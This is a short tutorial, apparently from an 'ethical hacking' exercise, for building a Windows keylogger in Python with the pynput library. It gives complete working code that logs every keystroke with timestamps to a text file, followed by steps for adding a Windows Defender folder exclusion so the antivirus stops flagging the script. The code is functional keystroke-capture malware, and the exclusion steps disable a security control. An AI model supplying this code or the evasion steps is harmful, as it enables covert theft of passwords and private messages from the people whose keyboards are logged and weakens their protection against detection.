# key logger
1. open cmd pip install pynput
2. create folder on desktop eg. EH
3. create two files in the folder
    1. keylog.py
    2. key_log.txt
4. code:
from pynput.keyboard import Key, Listener
import logging

# Set log directory
log_dir = r"C:\Users\Admin\Desktop\EH"

# Configure logging
logging.basicConfig(
    filename="key_log.txt",
    level=logging.DEBUG,
    format="%(asctime)s: %(message)s"
)

# Function to log key presses
def on_press(key):
    logging.info(str(key))  # Use str() instead of format()

# Start listening for key events
with Listener(on_press=on_press) as listener:
    listener.join()
5. run the code
6. if windows consider it as a virus then.
Go to Windows Security → Open Windows Defender.
Go to "Virus & threat protection"
Scroll down to "Exclusions" → Click "Add or remove exclusions"
Click "Add an exclusion" → Choose "Folder"
Select the folder where your script (key_log.txt and Python file) is located.